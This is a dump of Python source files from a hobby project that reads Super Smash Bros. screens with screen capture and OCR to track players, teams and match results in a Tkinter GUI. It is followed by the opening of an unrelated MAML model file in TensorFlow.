@ut.time_this def read_gsp(self, card): crop = card.crop(ut.COORDS['LOBBY']['PLAYER']['GSP']) text = ut.read_image(crop, 'gsp') self.gsp = int(text.replace(',', '')) class Team: def __init__(self, color): self.color = color self.players = [] self.gsp_total = 0 self.placement = '' def serialize(self, images_bool=True): players = [player.serialize(images_bool) for player in self.players] _copy = copy.copy(self) _copy.players = players return _copy.__dict__ def add_player(self, player): self.players.append(player) self.gsp_total += player.gsp class Game: def __init__(self, num=1): self.number = num self.mode = '' self.map = '' self.team_mode = False self.teams = [] self.player_count = 0 self.winning_color = '' self.start_time = 0 self.duration = 0 self.cancelled = '' self.colors_changed = False def serialize(self, images_bool=True): teams = [team.serialize(images_bool) for team in self.teams] _copy = copy.copy(self) _copy.teams = teams return _copy.__dict__ def load(self, data): self.__dict__.update(data) def read_card_screen(self, card_screen): self.read_basic_info(card_screen) self.read_cards(card_screen) @ut.time_this def read_basic_info(self, screen): crop = screen.crop(ut.COORDS['LOBBY']['GAME_INFO']) text = ut.read_image(crop) splits = text.split(' / ') self.mode = splits[0] self.map = splits[1] for map_str in MAP_NAME_FIXES: if map_str in self.map: self.map.replace(map_str, MAP_NAME_FIXES[map_str]) @ut.time_this def read_cards(self, screen): # screen.save('screen.png') id_slice = screen.crop(ut.COORDS['LOBBY']['CARDS_SLICE_IDS']) pil, cv = ut.convert_to_bw(id_slice, threshold=220, inv=False) # pil.save('slice.png') color_slice = screen.crop(ut.COORDS['LOBBY']['CARDS_SLICE_COLORS']) id_arr = np.asarray(pil) color_arr = np.asarray(color_slice) players = [] skip = 0 id_pixels = [p for row in id_arr for p in row] color_pixels = [p for row in color_arr for p in row] players = [] for i, id_pixel in enumerate(id_pixels): if skip: skip -= 1 elif id_pixel == 255: card_boundary = (i - 62, 375, i + 341, 913) crop = screen.crop(card_boundary) color = ut.match_color(arr=color_pixels[i - 5], mode='CARDS')[0] player = Player() player.read_card(crop) if player.character_name == '...': _print('GAME CANCELLED DUE TO UNREADABLE CHARACTER NAME') self.cancelled = 'UNREADABLE_CHARACTER_NAME' ut.send_command('b') else: players.append(player.character_name) self.player_count += 1 team = next((t for t in self.teams if t.color == color), None) if not team: team = Team(color) self.teams.append(team) team.add_player(player) skip = 340 if len(self.teams) == 2 and self.player_count > 2: self.team_mode = True elif len(set(players)) < len(players): _print('GAME CANCELLED DUE TO DUPLICATE CHARACTER IN FFA') self.cancelled = 'DUPLICATE_CHARACTER' ut.send_command('b') def read_start_screen(self, screen): time.sleep(1) screen = ut.capture_screen() if not self.team_mode and not self.cancelled: self.colors_changed = self.fix_colors(screen) if self.mode == 'Stock': # self.get_stock_templates(screen) pass elif self.mode == 'Time': pass elif self.mode == 'Stamina': pass else: _print(f'unknown mode: {self.mode}') # @ut.time_this def get_stock_templates(self, screen): stocks = [] for edge in ut.COORDS['GAME']['PLAYER']['INFO'][self.player_count]: stock_template_coords = list(ut.COORDS['GAME']['PLAYER']['STOCK_TEMPLATE']) stock_template_coords[0] = edge - stock_template_coords[0] stock_template_coords[2] = edge - stock_template_coords[2] template = screen.crop(stock_template_coords) player_stock_count = 1 while True: stock_template_coords[0] += STOCK_SPACING stock_template_coords[2] += STOCK_SPACING crop = screen.crop(stock_template_coords) sim = ut.avg_sim(crop, template) if sim > 95: player_stock_count += 1 else: break def fix_colors(self, screen): info = self.get_character_details_game(screen) players = [player for team in self.teams for player in team.players] _players = copy.copy(players) _teams = [] _print('Fixing colors:') for i, character_info in enumerate(info): name, color = character_info player = next((p for p in players if p.character_name == name), None) team = Team(color) team.add_player(player) _teams.append(team) _print(f'\t{team.color} - {player.character_name}') for team in self.teams: color = team.color character_name = team.players[0].character_name _team = next((t for t in _teams if t.color == color), None) if not _team or _team.players[0].character_name != character_name: self.teams = _teams return True return False def get_character_templates_lobby(self, screen): characters = [] for edge in ut.COORDS['GAME']['PLAYER']['INFO'][self.player_count]: char_template_coords = list(ut.COORDS['GAME']['PLAYER']['CHARACTER_TEMPLATE']) char_template_coords[0] = edge - char_template_coords[0] char_template_coords[2] = edge - char_template_coords[2] template = screen.crop(char_template_coords) template.save(f'{time.time()}.png') def get_character_templates_game(self, screen): characters = [] for edge in ut.COORDS['GAME']['PLAYER']['INFO'][self.player_count]: char_template_coords = list(ut.COORDS['GAME']['PLAYER']['CHARACTER_TEMPLAT']) char_template_coords[0] = edge - char_template_coords[0] char_template_coords[2] = edge - char_template_coords[2] template = screen.crop(char_template_coords) template.save(f'{time.time()}.png') def get_character_details_game(self, screen): info = [] rerun = True while rerun: for edge in ut.COORDS['GAME']['PLAYER']['INFO'][self.player_count]: color_coords = list(ut.COORDS['GAME']['PLAYER']['COLOR']) color_coords[0] = edge - color_coords[0] color_coords[2] = edge - color_coords[2] color_pixel = screen.crop(color_coords) color, _ = ut.match_color(pixel=color_pixel, mode='GAME') char_template_coords = list(ut.COORDS['GAME']['PLAYER']['NAME']) char_template_coords[0] = edge - char_template_coords[0] char_template_coords[2] = edge - char_template_coords[2] template = screen.crop(char_template_coords) bw, _ = ut.convert_to_bw(template) name_as_read = ut.read_image(bw).lower() if name_as_read: rerun = False if name_as_read in CHARACTER_NAME_FIXES: name_as_read = CHARACTER_NAME_FIXES[name_as_read] name = difflib.get_close_matches(name_as_read, CHARACTER_NAMES, n=1) if len(name): _print(f'{name_as_read.rjust(30)} --> {name}') info.append((name[0], color)) else: trainer_names = ['squirtle', 'charizard', 'ivysaur'] name = difflib.get_close_matches(name_as_read, trainer_names, n=1) if len(name): info.append(('pokémon trainer', color)) else: _print(f'Can\'t read <{name_as_read}>') # template.show() # template.save(f'{time.time()}.png') else: _print(f'Can\'t read <{name_as_read}>') return info def wait_for_go(self): coords = ut.COORDS['GAME'][''] template = ut.TEMPLATES['IDS']['FIGHT_START'] screen = ut.capture_screen() crop = screen.crop(coords) while ut.avg_sim(crop, template) > 85: screen = ut.capture_screen() crop = screen.crop(coords) time.sleep(0.1) self.start_time = time.time() def read_end_screen(self, screen): pass def read_results_screen(self, screen): if self.team_mode: coords = ut.COORDS['FINAL']['VICTORY_TEAM'] templates = ut.TEMPLATES['FINAL'] crop = screen.crop(coords) sim_template = ut.find_most_similar(crop, templates) color = sim_template[0].split('_')[0] self.winning_color = color _print(self.winning_color) else: coords = ut.COORDS['FINAL'] first_place_pixel = screen.crop(coords['VICTORY_PLAYER']) self.winning_color, sim = ut.match_color(pixel=first_place_pixel, mode='RESULTS') _print(self.winning_color) team = next((t for t in self.teams if t.color == self.winning_color), None) team.placement = '1st' # print(self.serialize())
Python
419
35.646778
106
/smash_reader/smash_game.py
0.530772
0.523217
badgerlordy/smash-bros-reader
refs/heads/master
import cv2 import datetime import numpy as np import os #import pytesseract as pyt import time from datetime import datetime from PIL import Image, ImageGrab, ImageDraw, ImageChops COORDS = { 'lobby-flag-screen-id': (379, 281, 1534, 445), 'lobby-flag-screen-player-markers': (70, 820, 1800, 821), 'flag-areas': ( [(763, 528, 1156, 792)], [(472, 531, 857, 788), (1062, 531, 1447, 788)], [(327, 531, 682, 768), (782, 531, 1137, 768), (1237, 531, 1592, 768)], [(273, 540, 582, 745), (627, 540, 936, 745), (981, 540, 1290, 745), (1335, 540, 1644, 745)] ) } HOME_DIR = os.path.dirname(os.path.realpath(__file__)) FLAG_DIR = os.path.join(HOME_DIR, 'flags') ########################################################### ########################### Main ########################## ########################################################### def main(): print('Starting') flags_dir = os.path.join(HOME_DIR, 'flags') if not os.path.isdir(flags_dir): os.mkdir(flags_dir) flag_list = [] for root, dirs, files in os.walk(flags_dir): for name in files: folder_index = int(os.path.split(root)[1]) if folder_index == len(flag_list): flag_list.append([name]) else: flag_list[folder_index].append(name) cooldown = 0 notif = False while True: if cooldown: cooldown -= 1 time.sleep(1) elif is_flag_screen(): notif = False print('Flag screen detected') img = ImageGrab.grab() img.save(os.path.join(HOME_DIR, 'screen.jpg')) flags = [] cooldown = 20 count = count_markers() if count > 0: count -= 1 flag_areas = COORDS['flag-areas'][count] for i, area in enumerate(flag_areas): flag = read_flag(i, area) if not flags: flags.append(flag) else: if not any([image_similarity(flag, _flag) for _flag in flags]): flags.append(flag) for flag in flags: name = new_flag(flag, flag_list) if name: print(f'New flag: {name}') else: if not notif: print('Waiting for flag screen') notif = True time.sleep(0.01) break ########################################################### ######################### Utility ######################### ########################################################### def time_this(func): def wrapper(*args, **kwargs): start_time = time.time() result = func(*args, **kwargs) end_time = time.time() duration = '{:.2f}'.format(end_time - start_time) print(f'function: {func.__name__} executed in {duration} seconds') return result return wrapper def new_flag(flag, flag_list): size = flag.size size_str = f'{size[0]}x{size[1]}' name = f'{size_str}.tif' if flag_list: for i, group in enumerate(flag_list): path = os.path.join(FLAG_DIR, str(i)) _flag = Image.open(os.path.join(path, group[0])) if image_similarity(_flag, flag): if name in group: return None else: group.append(name) if not os.path.isdir(path): os.mkdir(path) flag.save(os.path.join(path, name)) return f'{i}\\{name}' path = os.path.join(FLAG_DIR, str(len(flag_list))) flag_list.append([name]) if not os.path.isdir(path): os.mkdir(path) flag.save(os.path.join(path, name)) return f'{str(len(flag_list))}\\{name}' ########################################################### ########################## Image ########################## ########################################################### #@time_this def is_flag_screen(): screen_crop = ImageGrab.grab(COORDS['lobby-flag-screen-id']) img_template = Image.open(os.path.join(HOME_DIR, 'template.jpg')) if image_similarity(screen_crop, img_template): return True else: return False #@time_this def convert_to_bw(pil_img, threshold=127): cv_img = np.array(pil_img) img_gray = cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY) thresh, array_bw = cv2.threshold(img_gray, threshold, 255, cv2.THRESH_BINARY_INV) pil_bw = Image.fromarray(array_bw) ImageDraw.floodfill(pil_bw, xy=(1, 1), value=0) return pil_bw, array_bw #@time_this def count_markers(): img = ImageGrab.grab(COORDS['lobby-flag-screen-player-markers']) bw_img, bw_arr = convert_to_bw(img) skip = 0 markers = 0 for i, pixel in enumerate(bw_arr[0]): if skip: skip -= 1 continue if pixel == 0: markers += 1 skip = 100 return markers #@time_this def read_flag(i, area): img = ImageGrab.grab(area) dt = datetime.fromtimestamp(time.time()) t = dt.strftime('%Y_%m_%d-%H.%M.%S') name = f'{t}-{i}.tif' flag_dir = os.path.join(HOME_DIR, 'flags') if not os.path.isdir(flag_dir): os.mkdir(flag_dir) return img def image_similarity(img1, img2, min_sim=90): thumb_img1 = img1.resize((64, 64)) thumb_img2 = img2.resize((64, 64)) bw1, arr1 = convert_to_bw(thumb_img1) bw2, arr2 = convert_to_bw(thumb_img2) bw1.show() bw2.show() diff = ImageChops.difference(bw1, bw2) arr = np.asarray(diff) total = 0 different = 0 for row in arr: for pixel in row: total += 1 if pixel == 255: different += 1 sim = ((1 - (different/total)) * 100) return sim > min_sim ########################################################### ######################### Launch ########################## ########################################################### if __name__ == '__main__': main()
Python
203
29.054188
99
/smash_reader/flags.py
0.476971
0.439272
badgerlordy/smash-bros-reader
refs/heads/master
from datetime import datetime import json from logger import log_exception import numpy as np import os from PIL import Image, ImageTk import platform from queue import Queue, Empty import requests import smash_game import smash_utility as ut import smash_watcher from sys import argv, excepthook import time import tkinter as tk excepthook = log_exception TITLE = 'SmashBet Screen Watcher' output = False def _print(*args, **kwargs): if output: args = list(args) args.insert(0, '<GUI>') print(*args, **kwargs) BASE_DIR = os.path.realpath(os.path.dirname(__file__)) BG = ['#282C34', '#383D48'] FG = ['#9098A6', '#9DA5B4', '#ABB3BF', '#E06C75', '#61AFEF', '#56B6C2', '#98C379'] def config_grids(widget, rows=[], columns=[]): [widget.rowconfigure(i, weight=weight) for i, weight in enumerate(rows)] [widget.columnconfigure(i, weight=weight) for i, weight in enumerate(columns)] class Menubar(tk.Menu): def __init__(self, master): super().__init__(master) self.master = master self.file_menu = tk.Menu(self, tearoff=0) # self.file_menu.add_command(label='Load State', command=self.load_state) # self.file_menu.add_command(label='Save State', command=self.save_state) # self.file_menu.add_separator() self.file_menu.add_command(label='Restart', command=self.master.restart) self.file_menu.add_command(label='Quit', command=self.master.quit) self.debug_menu = tk.Menu(self, tearoff=0) self.debug_menu.add_command(label='Clear console', command=ut.clear_console) self.output_menu = tk.Menu(self, tearoff=0) self.output_menu.add_command( label='Silence watcher', command=lambda: self.toggle_output(smash_watcher, 'watcher', 0) ) self.output_menu.add_command( label='Silence game', command=lambda: self.toggle_output(smash_game, 'game', 1) ) self.output_menu.add_command( label='Silence utility', command=lambda: self.toggle_output(ut, 'utility', 2) ) self.debug_menu.add_cascade(label='Outputs', menu=self.output_menu) self.debug_menu.add_separator() self.debug_menu.add_command(label='Print game data', command=lambda: print(self.master.watcher.game.serialize(images_bool=False))) self.debug_menu.add_separator() self.debug_menu.add_command(label='Capture cards_id template', command=ut.capture_cards_id) self.debug_menu.add_command(label='Character name debugging', command=self.master.character_name_debugging) self.debug_menu.add_command(label='Click spectate', command=self.master.click_spectate) self.add_cascade(label='File', menu=self.file_menu) self.add_cascade(label='Debug', menu=self.debug_menu) def toggle_output(self, module, name, index): if module.output: self.output_menu.entryconfig(index, label=f'Unsilence {name}') else: self.output_menu.entryconfig(index, label=f'Silence {name}') module.output = not module.output def load_state(self): path = os.path.join(BASE_DIR, 'game_state.json') if os.path.isfile(path): with open(path, 'r') as infile: return json.load(infile) else: return None def save_state(self): game = self.master.game if game: path = os.path.join(BASE_DIR, 'game_state.json') with open(path, 'w+') as outfile: json.dump(game, outfile) class PlayerFrame(tk.Frame): def __init__(self, master, player_info, *args, **kwargs): super().__init__(master, *args, **kwargs) self.master = master self.info = player_info config_grids(self, rows=[1, 1], columns=[1, 1]) self.player_number_label = tk.Label(self, text=f'Player {self.info["number"]}', bg=self['background']) self.player_number_label.grid(row=0, column=0, sticky='nsw', padx=10) self.character_name_label = tk.Label( self, text=f'Character: {self.info["character_name"].title()}', bg=self['background'] ) self.character_name_label.grid(row=0, column=1, sticky='nsw', padx=10) self.gsp_label = tk.Label(self, text=f'GSP: {self.info["gsp"]}', bg=self['background']) self.gsp_label.grid(row=1, column=0, sticky='nsw', padx=10) arr = np.array(self.info['player_name_image']) try: img = Image.fromarray(arr.astype('uint8')) img = img.resize((200, 30), Image.NEAREST) img = img.convert('1').tobitmap() bitmap = ImageTk.BitmapImage(data=img) self.player_name_label = tk.Label(self, image=bitmap, bg=self.master['background']) self.player_name_label.image = bitmap self.player_name_label.grid(row=1, column=1, sticky='nw', padx=10) except TypeError: _print(arr) _print('Image data corrupted') try: ut.dump_image_data(arr) _print('Image data successfully dumped') except: _print('Failed to dump image data') class TeamFrame(tk.Frame): def __init__(self, master, team_info, *args, **kwargs): super().__init__(master, *args, **kwargs) self.master = master self.info = team_info self.build_player_frames() def build_player_frames(self): COLORS = { 'RED': (252, 208, 197), 'BLUE': (163, 220, 248), 'YELLOW': (246, 237, 166), 'GREEN': (160, 235, 186) } if self.info['placement']: self.placement_label = tk.Label( self, bg=self['background'], fg=BG[0], text=f'{self.info["placement"]} place' ) self.info['players'].sort(key=lambda player: player['number']) player_frames = [] player_len = len(self.info['players']) self.gsp_label = tk.Label(self, bg=self['background'], fg=BG[0], text=f'Team GSP: {self.info["gsp_total"]}') self.gsp_label.grid(row=0, column=1, columnspan=player_len, sticky='nsw') config_grids(self, rows=[1]*(player_len+1), columns=[1, 1]) config_grids(self, rows=[0]) for i, player in enumerate(self.info['players']): hex_color = ut.rgb_to_hex(COLORS[self.info['color']]) player_frames.append(PlayerFrame(self, player, bg=hex_color)) player_frames[i].grid(row=i+1, column=0, columnspan=2, sticky='nsew', padx=10, pady=(0, 10)) class GameFrame(tk.Frame): def __init__(self, master, *args, **kwargs): super().__init__(master, *args, **kwargs) self.master = master self.game_number = tk.StringVar() self.game_mode = tk.StringVar() self.game_map = tk.StringVar() self.game_duration = tk.StringVar() config_grids(self, rows=[0, 1], columns=[1]) self.info_frame = tk.Frame(self, bg=BG[0]) config_grids(self.info_frame, rows=[1, 1], columns=[1, 1]) self.info_frame.grid(row=0, column=0, sticky='nsew') self.game_mode_label = tk.Label(self.info_frame, bg=BG[0], fg=FG[0], textvariable=self.game_mode) self.game_mode_label.grid(row=0, column=0, sticky='nsew') self.game_map_label = tk.Label(self.info_frame, bg=BG[0], fg=FG[0], textvariable=self.game_map) self.game_map_label.grid(row=0, column=1, sticky='nsew') self.game_number_label = tk.Label(self.info_frame, bg=BG[0], fg=FG[0], textvariable=self.game_number) self.game_number_label.grid(row=1, column=0, sticky='nsew') self.game_duration_label = tk.Label(self.info_frame, bg=BG[0], fg=FG[0], textvariable=self.game_duration) self.game_duration_label.grid(row=1, column=1, sticky='nsew') def display_info(self): self.master.game = self.master.watcher.game.serialize() game = self.master.game self.game_number.set(f'Game #{game["number"]}') self.game_map.set(f'Map: {game["map"]}') self.game_mode.set(f'Mode: {game["mode"]}') if game['start_time']: self.game_duration.set( f'Game began {time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(game["start_time"]))}' ) elif game['duration']: self.game_duration.set(f'Game completed in {game["duration"]} seconds') self.build_team_frames(game) def build_team_frames(self, game): color_order = ['RED', 'BLUE', 'YELLOW', 'GREEN'] if hasattr(self, 'teams_frame'): self.teams_frame.destroy() self.teams_frame = tk.Frame(self, bg=BG[1]) self.teams_frame.grid(row=1, column=0, sticky='nsew') team_len = len(game['teams']) config_grids(self.teams_frame, rows=[1]*team_len, columns=[1]) game['teams'].sort(key=lambda team: color_order.index(team['color'])) team_frames = [] for team_index, team in enumerate(game['teams']): hex_color = ut.rgb_to_hex(ut.COLORS['CARDS'][team['color']]) team_frames.append(TeamFrame(self.teams_frame, team, bg=hex_color)) team_frames[team_index].grid(row=team_index, column=0, sticky='nsew', pady=(0, 10)) class WatcherFrame(tk.Frame): def __init__(self, master, *args, **kwargs): super().__init__(master, *args, **kwargs) self.master = master config_grids(self, rows=[0, 0], columns=[1]) self.toggle_watcher_button = tk.Button( self, bg=FG[1], fg=BG[1], bd=0, text='Start watcher', command=self.toggle_watcher ) self.toggle_watcher_button.grid(row=0, column=0, sticky='ew', pady=(0, 5)) self.watcher_status = tk.Label(self, text='Watcher stopped', bg=BG[0], fg=FG[3]) self.watcher_status.grid(row=1, column=0, sticky='ew') def toggle_watcher(self): if self.master.watcher.isAlive(): # STOP self.master.watcher_queue.put('quit') self.master.watcher.join() self.toggle_watcher_button.config(text='Start watcher') self.watcher_status.config(text='Watcher stopped', fg=FG[3]) else: # START self.master.watcher = smash_watcher.Watcher(self.master.watcher_queue, self.master.queue) self.master.watcher.start() self.toggle_watcher_button.config(text='Stop watcher') self.watcher_status.config(fg=FG[6]) self.master.game_frame.destroy() self.master.game_frame = GameFrame(self.master, bg=BG[1]) self.master.game_frame.grid(row=1, column=0, sticky='nsew', padx=10, pady=10) class Window(tk.Frame): def __init__(self, master, *args, **kwargs): super().__init__(*args, **kwargs) self.master = master self.watcher = None self.cont = True self.queue = Queue() self.watcher_queue = Queue() self.character_name_debugging_enabled = False self.watcher = smash_watcher.Watcher(self.watcher_queue, self.queue) self.watcher.daemon = True self.game = None self.restart_flag = False self.pack(fill=tk.BOTH, expand=True) self.master.title(TITLE) config_grids(self, rows=[0, 1], columns=[1]) self.game_frame = GameFrame(self, bg=BG[1]) self.game_frame.grid(row=1, column=0, sticky='nsew', padx=10, pady=10) self.watcher_frame = WatcherFrame(self, bg=BG[0]) self.watcher_frame.grid(row=0, column=0, sticky='nsew', padx=10, pady=10) self.menubar = Menubar(self) self.master.config(menu=self.menubar) self.loop() def loop(self): if self.cont: self.check_queue() self.master.after(100, self.loop) def check_queue(self): try: item = self.queue.get(block=False) if item == 'update': self.game_frame.display_info() if 'status' in item: self.watcher_frame.watcher_status.config(text=item['status']) except Empty: pass def quit(self): self.cont = False self.master.destroy() def restart(self): self.quit() self.restart_flag = True def character_name_debugging(self): if not self.character_name_debugging_enabled: self.watcher.lock(1) smash_game.character_name_debugging_enabled = True else: self.watcher.unlock() smash_game.character_name_debugging_enabled = False self.character_name_debugging_enabled = not self.character_name_debugging_enabled def click_spectate(self): self.watcher.game.cancelled = 'DEBUG' def run_gui(): root = tk.Tk() root.geometry('540x550') window = Window(root, bg=BG[0]) if ut.SETTINGS['AUTO_START_WATCHER'].lower() == 'true': window.watcher_frame.toggle_watcher() root.mainloop() if window.watcher.isAlive(): window.watcher_queue.put('quit') window.watcher.join() if window.restart_flag: system = platform.system() if system == 'Windows': os.system(__file__) if system == 'Linux': os.system('python3 ' + __file__) def headless(): queue = Queue() watcher_queue = Queue() watcher = smash_watcher.Watcher(watcher_queue, queue) watcher.start() _input = '' while _input not in ['stop', 'exit', 'quit']: _input = input('>: ') key_capture.put('quit') key_capture.join() watcher_queue.put('quit') watcher.join() if __name__ == '__main__': print(f'\n\n{"*" * 40} {TITLE} {"*" * 40}') print(f'<<<{datetime.fromtimestamp(time.time()).strftime("%Y-%m-%d %H:%M:%S")}>>>') if len(argv): if '-nogui' in argv: headless() else: run_gui()
Python
384
35.171875
138
/smash_reader/smash.py
0.596544
0.581281
badgerlordy/smash-bros-reader
refs/heads/master
from datetime import datetime import os from sys import __excepthook__ from time import time from traceback import format_exception BASE_DIR = os.path.realpath(os.path.dirname(__file__)) def log_exception(type, value, tb): error = format_exception(type, value, tb) filepath = os.path.join(BASE_DIR, 'error.log') old_text = '\n' if os.path.isfile(filepath): with open(filepath, 'r') as logfile: old_text += logfile.read() timestamp = datetime.fromtimestamp(time()).strftime('%Y-%m-%d %H:%M:%S') line = f'[{timestamp}]\n{("".join(error))}' new_text = line + old_text with open(filepath, 'w+') as logfile: logfile.write(new_text) __excepthook__(type, value, tb)
Python
23
30.956522
76
/smash_reader/logger.py
0.635374
0.635374
badgerlordy/smash-bros-reader
refs/heads/master
import json from logger import log_exception import os from queue import Empty import re import requests import smash_game import smash_utility as ut import sys import threading import time sys.excepthook = log_exception output = True def _print(*args, **kwargs): if output: args = list(args) args.insert(0, '<Watcher>') print(*args, **kwargs) class Watcher(threading.Thread): def __init__(self, watcher_queue, gui_queue): # print('\n') super().__init__() self.queue = watcher_queue self.gui_queue = gui_queue self.id_coords = [ ('LOBBY', 'FLAGS_ID'), ('LOBBY', 'CARDS_ID'), (), (), ('GAME', 'END_ID'), ('FINAL', 'ID'), ('FINAL', 'ID2') ] self.locked = False self.reset() # Game finished or cancelled def reset(self): if not self.locked: self.current_type_index = 0 self.list_limit = 3 self.sim_lists = [[0] * self.list_limit for _ in range(len(self.id_coords))] self.cont = True self.current_game_num = len(ut.load_game_data()) + 1 self.game = smash_game.Game(self.current_game_num) self.timer_detected = False self.timer_visible = False self.timer_running = False self.timer_running_templates = (None, None) self.timer_sim_hits = 0 # Starts when watcher is created and loops forever def run(self): _print('Watching for flags') self.gui_queue.put({'status': 'Watching for flag screen'}) while self.cont: timer_vis_sim = 0 timer_milli_sim = 0 self.cap = ut.capture_screen() crop = self.cap.crop(ut.COORDS['MENU']['FAILED_TO_PLAY_REPLAY']) if ut.avg_sim(crop, ut.TEMPLATES['MENU']['FAILED_TO_PLAY_REPLAY']) >= 95: self.game.cancelled = 'REPLAY_FAILED' time.sleep(5) ut.send_command('a') if self.game.cancelled: self.reset() if not self.locked: self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for menu screen'}) self.watch_for_menu() if not self.locked: self.gui_queue.put({'status': 'Watching for flag screen'}) # check timer visibility and movement, set class variables if self.current_type_index >= 2: timer_vis_sim = self.check_timer_visibility() timer_milli_sim = 0 if self.timer_detected: timer_milli_sim = self.check_timer_movement() # look for the timer at the beginning if self.current_type_index == 2: if self.timer_detected: _print(f'timer detected: {timer_vis_sim}') self.read_screen_data() # wait for the timer to start moving elif self.current_type_index == 3: if self.timer_running: _print(f'timer movemement detected: {timer_milli_sim}') self.read_screen_data() # check to see if the timer is stopped, or the "GAME" text is # detected, or the results screen is detected elif self.current_type_index == 4: if self.check_screen_basic() > 90: # pass because read_screen_data will be called if True # and the rest of the checks will be skipped pass else: # Timer stopped if not self.timer_running: self.read_screen_data() # Results screen detected else: checks = [ self.check_screen_basic(index=5, normal=False), self.check_screen_basic(index=6, normal=False) ] if sum(checks) / 2 > 80: # run twice because the match end screen was missed self.read_screen_data() self.read_screen_data() # check for current basic template (flags, cards, results) else: self.check_screen_basic() self.check_queue() time.sleep(0.1) def check_queue(self): if self.queue: try: item = self.queue.get(block=False) if item == 'quit': self.cont = False except Empty: pass def lock(self, index): self.current_type_index = index - 1 self.read_screen_data() self.locked = True def unlock(self): self.locked = False self.reset() def watch_for_menu(self): templates = [ ut.TEMPLATES['MENU']['SPECTATE_SELECTED'], ut.TEMPLATES['LOBBY']['FLAGS_ID'] ] while self.cont: cap = ut.capture_screen() self.check_queue() crop = cap.crop(ut.COORDS['MENU']['SPECTATE_SELECTED']) if ut.avg_sim(crop, templates[0]) > 95: time.sleep(5) ut.send_command('a') break crop = cap.crop(ut.COORDS['LOBBY']['FLAGS_ID']) if ut.avg_sim(crop, templates[1]) > 95: break ut.send_command('a') time.sleep(2) # @ut.pad_time(0.20) def check_screen_basic(self, index=-1, normal=True, screen=None, area=None): if index == -1: index = self.current_type_index if not screen and not area: screen, area = self.id_coords[index] sim = ut.area_sim(self.cap, screen, area) l = self.sim_lists[index] l.insert(0, sim) del l[-1] avg = sum(l) / len(l) if avg > 90: _print(f'Screen type {{{index}}} sim: {avg}') if normal: l = [0] * self.list_limit self.read_screen_data() return avg def check_timer_visibility(self): timer_vis_crop = self.cap.crop(ut.COORDS['GAME']['TIMER_VISIBLE']) template = ut.TEMPLATES['GAME']['TIMER_VISIBLE'] timer_vis_sim = ut.avg_sim(timer_vis_crop, template) if timer_vis_sim > 95: # _print(f'timer vis sim: {timer_vis_sim}') if not self.timer_detected: self.timer_detected = True self.timer_visible = True else: self.timer_visible = False return timer_vis_sim def check_timer_movement(self): timer_sim = 0 if self.timer_visible: coords = ut.COORDS['GAME']['TIMER_MILLI'] crops = [self.cap.crop(coord) for coord in coords] # [crop.show() for crop in crops] if all(self.timer_running_templates): timer_sim = sum([ut.avg_sim(t, c) for t, c in zip(self.timer_running_templates, crops)]) / 2 # for i, crop in enumerate(crops): # timer_sim = ut.avg_sim(crop, self.timer_running_templates[i]) / (i + 1) if timer_sim > 90: _print(f'timer sim: {timer_sim}') self.timer_sim_hits += 1 if self.timer_sim_hits >= 3: if self.timer_running: # self.read_screen_data() self.timer_running = False else: self.timer_running = True self.timer_sim_hits = 0 self.timer_running_templates = crops return timer_sim def battle_watcher(self): pass def filter_and_post(self, game): data = { 'game': ut.filter_game_data( game, self.current_type_index ), 'mode': self.current_type_index } ut.post_data(data) def read_screen_data(self): qp = lambda: self.filter_and_post(self.game.serialize(images_bool=False)) # Flags if self.current_type_index == 0: self.gui_queue.put('update') _print('Flags detected') self.gui_queue.put({'status': 'Watching for card screen'}) # Cards if self.current_type_index == 1: _print('Cards detected') self.gui_queue.put({'status': 'Reading cards'}) time.sleep(1) self.cap = ut.capture_screen() self.game.read_card_screen(self.cap) qp() self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for battle pregame'}) # Pregame if self.current_type_index == 2: _print('Battle pregame detected') self.game.read_start_screen(self.cap) qp() self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for battle start'}) # Game started if self.current_type_index == 3: _print('Battle start detected') qp() self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for battle end'}) # Game ended if self.current_type_index == 4: _print('Battle end detected') qp() self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for battle results'}) # Results if self.current_type_index == 5: _print('Battle results detected') self.game.read_results_screen(self.cap) qp() self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for flag screen'}) # ut.save_game_data(self.game.serialize()) if not self.locked: self.current_type_index += 1 if self.current_type_index >= 6: self.reset() _print(f'Mode changed to {self.current_type_index}') # _print(json.dumps(self.game.serialize(), separators=(',', ': ')))
Python
290
34.265518
108
/smash_reader/smash_watcher.py
0.505427
0.499169
radrumond/hidra
refs/heads/master
# ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow import os import numpy as np import tensorflow as tf from archs.maml import MAML class Model(MAML): def __init__(self,train_lr,meta_lr,image_shape,isMIN, label_size=2): super().__init__(train_lr,meta_lr,image_shape,isMIN,label_size) def dense_weights(self): weights = {} cells = {} initializer = tf.contrib.layers.xavier_initializer() print("Creating/loading Weights") divider = 1 inic = 1 filters = 64 finals = 64 if self.isMIN: divider = 2 inic = 3 finals = 800 filters = 32 with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE): weights['c_1'] = tf.get_variable('c_1', shape=(3,3, inic,filters), initializer=initializer) weights['c_2'] = tf.get_variable('c_2', shape=(3,3,filters,filters), initializer=initializer) weights['c_3'] = tf.get_variable('c_3', shape=(3,3,filters,filters), initializer=initializer) weights['c_4'] = tf.get_variable('c_4', shape=(3,3,filters,filters), initializer=initializer) weights['cb_1'] = tf.get_variable('cb_1', shape=(filters), initializer=tf.initializers.constant) weights['cb_2'] = tf.get_variable('cb_2', shape=(filters), initializer=tf.initializers.constant) weights['cb_3'] = tf.get_variable('cb_3', shape=(filters), initializer=tf.initializers.constant) weights['cb_4'] = tf.get_variable('cb_4', shape=(filters), initializer=tf.initializers.constant) weights['d_1'] = tf.get_variable('d_1w', [finals,self.label_size], initializer = initializer) weights['b_1'] = tf.get_variable('d_1b', [self.label_size], initializer=tf.initializers.constant) """weights['mean'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) weights['variance'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) weights['offset'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) weights['scale'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() ) weights['mean1'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) weights['variance1'] 